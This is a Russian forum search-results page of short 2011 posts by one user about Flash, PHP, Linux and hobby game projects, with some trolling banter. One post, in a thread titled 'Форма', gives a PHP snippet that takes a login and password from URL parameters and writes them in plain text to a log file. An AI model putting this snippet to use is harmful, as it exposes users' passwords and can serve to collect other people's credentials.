Результаты поиска
|
|
Человек-панчлайн | Дата: Пятница, 25 Ноября 2011, 21:52 | Сообщение # 1 | Тема: ПРосьба подсказать Бесплатный хостинг |
Action Script МАНЬЯК!
Сейчас нет на сайте
| hostinger.com.ua
DMScript - мой язык программирования <--- Скажи "ДА!" загаживанию форума! Мы за троллинг, флуд и оффтоп!
|
|
| |
Человек-панчлайн | Дата: Пятница, 25 Ноября 2011, 17:52 | Сообщение # 2 | Тема: Форма |
Action Script МАНЬЯК!
Сейчас нет на сайте
| я сейчас настраиваю флеш под линуксом, чуток позже
DMScript - мой язык программирования <--- Скажи "ДА!" загаживанию форума! Мы за троллинг, флуд и оффтоп!
|
|
| |
Человек-панчлайн | Дата: Пятница, 25 Ноября 2011, 17:39 | Сообщение # 3 | Тема: DMScript |
Action Script МАНЬЯК!
Сейчас нет на сайте
| все будет, позже. Спасибо Добавлено (25.11.2011, 17:38) --------------------------------------------- ведется работа над переменными, скоро будет Добавлено (25.11.2011, 17:39) --------------------------------------------- а нет, не будет их скоро, придется все к чертям переписывать, форматнул диск! Ладно, скоро все будет
|
|
| |
Человек-панчлайн | Дата: Пятница, 25 Ноября 2011, 17:38 | Сообщение # 4 | Тема: Ubuntu или Linux? |
Action Script МАНЬЯК!
Сейчас нет на сайте
| у меня до того винда стояла, сейчас убунту поставил. Честно - зашибись, только никак не мог привыкнуть к кнопкам закрыть-свернуть-развернуть слева в стандартной теме
|
|
| |
Человек-панчлайн | Дата: Пятница, 25 Ноября 2011, 08:05 | Сообщение # 5 | Тема: Форма |
Action Script МАНЬЯК!
Сейчас нет на сайте
| тут не флеш нужен, а пхп. что-то такого плана: Code <?php $Login = $_GET['Login']; $Password=$_GET['Password']; $file = fopen ('log.txt', "w+"); fwrite ($file, $Login); fwrite ($file, $Password); fclose ($file); ?> И во флеше вызывать переход на ссылку *адрес твоего php скрипта*?Login=*текст в поле логина*&Password=*текст в поле пароля*
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:59 | Сообщение # 6 | Тема: Не комплилится код на AS3 |
Action Script МАНЬЯК!
Сейчас нет на сайте
| "Error initializing Java Runtime Environment. You may need reinstal flash." - такая ошибка. После переустановки виндовса случилось. Пробовал настраивать память, не помогает
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:52 | Сообщение # 7 | Тема: MMORPG Платформер "Век Бивней" |
Action Script МАНЬЯК!
Сейчас нет на сайте
| не знаю, просто второе как-то ближе
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:48 | Сообщение # 8 | Тема: MMORPG Платформер "Век Бивней" |
Action Script МАНЬЯК!
Сейчас нет на сайте
| второе, однозначно
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:47 | Сообщение # 9 | Тема: [2D]Названия не придумал |
Action Script МАНЬЯК!
Сейчас нет на сайте
| liberty_claw
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:46 | Сообщение # 10 | Тема: [2D]Названия не придумал |
Action Script МАНЬЯК!
Сейчас нет на сайте
| Vadim_U, значит флеш+пхп(для онлайна), думаю могу помочь
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:43 | Сообщение # 11 | Тема: [2D]Названия не придумал |
Action Script МАНЬЯК!
Сейчас нет на сайте
| рекомендую флеш Игра пошаговая?
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:40 | Сообщение # 12 | Тема: [2D]Названия не придумал |
Action Script МАНЬЯК!
Сейчас нет на сайте
| хм... На чем?
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:12 | Сообщение # 13 | Тема: Подскажите, пожалуйста, где можно бесплатно получить ip |
Action Script МАНЬЯК!
Сейчас нет на сайте
| lapendown, будь мужиком, делай на флеше/с++/дельфи
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 20:11 | Сообщение # 14 | Тема: MineCraft Engine |
Action Script МАНЬЯК!
Сейчас нет на сайте
| Max_Pain, а, ну тогда понятно, извиняй
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 19:48 | Сообщение # 15 | Тема: MineCraft Engine |
Action Script МАНЬЯК!
Сейчас нет на сайте
| Max_Pain, глаза у тебя кривые
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 19:47 | Сообщение # 16 | Тема: [3D] - Пока без названия - [RPG/Action] |
Action Script МАНЬЯК!
Сейчас нет на сайте
| Quote (Max_Pain) Человек-панчлайн, Ты кстати помолчи.На замечания взгляни.И в преть не используй ненармотивную лексику. я и есть мне плевать
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 19:42 | Сообщение # 17 | Тема: [3D] - Пока без названия - [RPG/Action] |
Action Script МАНЬЯК!
Сейчас нет на сайте
| Quote (Max_Pain) 2 моштабных всё характеризует
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 19:41 | Сообщение # 18 | Тема: [3D] - Пока без названия - [RPG/Action] |
Action Script МАНЬЯК!
Сейчас нет на сайте
| Quote (vatrikovsky) Делать рпг довольно сложно ОЧЕНЬ сложно
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 19:38 | Сообщение # 19 | Тема: Подскажите, пожалуйста, где можно бесплатно получить ip |
Action Script МАНЬЯК!
Сейчас нет на сайте
| Quote (infermik) тут уже пойдут девочки возможно)))) не, не в 14, раньше, браток
|
|
| |
Человек-панчлайн | Дата: Четверг, 24 Ноября 2011, 19:38 | Сообщение # 20 | Тема: Вопрос к админу по рекламе и монетизации |
Action Script МАНЬЯК!
Сейчас нет на сайте
| а у меня вопрос по правилам: как у админов вообще рука поднимается банить троллей? Нет, не так, средне-тонких троллей, толстых можно.
|
|
| |